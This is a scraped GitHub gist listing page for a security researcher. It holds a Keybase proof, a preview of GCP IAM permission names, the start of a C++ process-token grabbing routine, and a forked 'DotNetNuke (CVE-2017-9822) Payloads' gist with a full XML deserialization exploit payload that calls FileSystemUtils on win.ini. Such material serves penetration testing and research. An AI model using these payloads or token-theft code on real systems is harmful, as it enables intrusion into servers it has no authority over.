Skip to content

Instantly share code, notes, and snippets.

View felamos's full-sized avatar

Φέλαμος felamos

View GitHub Profile

Keybase proof

I hereby claim:

  • I am felamos on github.
  • I am felamos (https://keybase.io/felamos) on keybase.
  • I have a public key ASDTCEhUpIFK_rjTydJY3eY4SQEQgN4l469Mfc3uF2yYAwo

To claim this, I am signing this object:

aiplatform.batchPredictionJobs.create
aiplatform.datasets.create
aiplatform.trainingPipelines.create
appengine.applications.create
appengine.applications.get
appengine.applications.update
appengine.instances.delete
appengine.instances.list
appengine.memcache.addKey
appengine.memcache.flush
#include <iostream>
#include <Windows.h>
#include <tchar.h>
HANDLE GetToken(DWORD pid)
{
HANDLE f = OpenProcess(MAXIMUM_ALLOWED, NULL, pid);
if (!f)
{
@felamos
felamos / ReadFile.xml
Created April 1, 2020 17:11 — forked from pwntester/ReadFile.xml
DotNetNuke (CVE-2017-9822) Payloads
<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">C:/windows/win.ini</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>